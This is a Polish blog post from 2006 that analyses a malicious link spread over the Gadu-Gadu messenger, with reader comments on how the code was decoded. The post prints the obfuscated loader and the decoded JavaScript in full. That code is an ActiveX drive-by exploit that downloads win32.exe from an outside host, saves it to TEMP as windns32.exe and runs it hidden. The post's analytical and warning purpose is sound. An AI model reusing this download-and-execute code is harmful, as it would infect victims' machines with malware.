h1

GG-robaczek ?

Październik 29, 2006

dzisiaj wiele osob dostalo na gg wiadomosc z linkiem…zapewne wiele osob otworzyla (o czym swiadlczyl by timeout co chwile na serwerze”atakujacych”.). Czym jest ta strona ? kolejny coded javascript… ( przy Javacsripcie pomagal Kloss ).

co trzeba zrobic ? przeleciec procesy (ctrl+alt+del) i poszukac czy nie ma gdzies tam dodatkowego win32 czy windns32.exe


var NÚotUwcbW='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
function ylNQjyCnG(EMOpwBlDw)
{
var tBdBWMfUk='', BNVhoXkÚA, edQLRSsLw2, FquDSdeLi, qrFrvqeTÚ, VXWCoWUGl, bXpkBbvcW, jOAwRfyvk, phwfÚbvus=0;EMOpwBlDw=EMOpwBlDw.replace(/[^A-Za-z0-9\+\/\=]/g, '');
do {
qrFrvqeTÚ=NÚotUwcbW.indexOf(EMOpwBlDw.charAt(phwfÚbvus++)); VXWCoWUGl=NÚotUwcbW.indexOf(EMOpwBlDw.charAt(phwfÚbvus++)); bXpkBbvcW=NÚotUwcbW.indexOf(EMOpwBlDw.charAt(phwfÚbvus++)); jOAwRfyvk=NÚotUwcbW.indexOf(EMOpwBlDw.charAt(phwfÚbvus++));
BNVhoXkÚA=(qrFrvqeTÚ << 2) | (VXWCoWUGl >> 4);
LwuWKtEKc=((VXWCoWUGl & 15) << 4) | (bXpkBbvcW >> 2);
FquDSdeLi=((bXpkBbvcW & 3) << 6) | jOAwRfyvk;
tBdBWMfUk=tBdBWMfUk+String.fromCharCode(BNVhoXkÚA);
if (bXpkBbvcW!=64) tBdBWMfUk=tBdBWMfUk+String.fromCharCode(LwuWKtEKc);
if (jOAwRfyvk!=64) tBdBWMfUk=tBdBWMfUk+String.fromCharCode(FquDSdeLi);
}
while (phwfÚbvus<EMOpwBlDw.length);
eval(tBdBWMfUk);
}

po odkodowaniu mamy :

function Log(m) {
var log = document.createElement('p');
log.innerHTML = m;
}
function CreateO(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);
}
function Go(a) {
Log(' ');
var s = CreateO(a, "WScript.Shell");
var o = CreateO(a, "ADODB.Stream");
var e = s.Environment("Process");
Log(' ');
var url = "http://www.brico-ok.com/win32.exe";
var xml = null;
var bin = e.Item("TEMP") + "windns32.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if (! xml) return(0);
Log(' ');
xml.open("GET", url, false);
xml.send(null);
dat = xml.responseBody;
Log(' ');
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);
Log(' ');
s.Run(bin,0);
}
function Exploit() {
var i = 0;
var t = new Array('
{BD96C556-65A3-11D0-983A-00C04FC29E36}','
{BD96C556-65A3-11D0-983A-00C04FC29E36}','
{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','
{0006F033-0000-0000-C000-000000000046}','
{0006F03A-0000-0000-C000-000000000046}','
{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','
{6414512B-B978-451D-A0D8-FCFDF33E833C}','
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','
{06723E09-F4C2-43c8-8358-09FCD1DB0766}','
{639F725F-1B2D-4831-A9FD-874847682010}','
{BA018599-1DB3-44f9-83B4-461454C84BF8}','
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','
{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);
while (t[i]) {
var a = null;
if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}
if (a) {
try {
var b = CreateO(a, "WScript.Shell");
if (b) {
Log(' ');
Go(a);
return(0);
}
} catch(e){}
}
i++;
}
Log(' ');
}
Exploit();

3 uwag

  1. Czym to odkodowałeś ?:>


  2. najpierw zamienilem eval na document.print co zamiast uruchamiac skrypt narysowalo mi go na ekranie w postaci zakodowanej. Potem to juz byl prostu URLencode i tada…


  3. Witaj, widze, ze oprocz bycia tricksterem ladnie stojacym na rekach, to jestes tez utalentowanym programista :) Jestes pierwsza osoba na jaka trafilem w ciagu ostatnich paru miesiecy, ktora praktykuje reverse engineering ( z pomoca czyjas, np. Klossa, lub bez niej) :D Tak, unescape, a potem http www google pl/search?q=%kody_szesnastkowe… – jak widzisz prawie tak samo to odkodowywalem jak Wy. P.S. Tez cwicze triki, a ostatnio spotkalem na pewnym spotkaniu codeguru kumpla trikstera, ktory tez sie okazalo, ze jest na informatyce. Poza tym duzo osob znam zwiazanych wlasnie z ta dziedzina, ktore cwicza. A jesli nie sa na infie lub infopodobnym kierunku, to sie znaja tak dobrze na kompie, robieniu stron, filmikow, programowaniu, ze … ze normalnie to jest jakas ciekawa prawidlowosc … :) Pzdr.



Skomentuj

Wprowadź swoje dane lub kliknij jedną z tych ikon, aby się zalogować:

Logo WordPress.com

Komentujesz korzystając z konta WordPress.com. Log Out / Zmień )

Zdjęcie z Twittera

Komentujesz korzystając z konta Twitter. Log Out / Zmień )

Facebook photo

Komentujesz korzystając z konta Facebook. Log Out / Zmień )

Google+ photo

Komentujesz korzystając z konta Google+. Log Out / Zmień )

Connecting to %s

%d bloggers like this: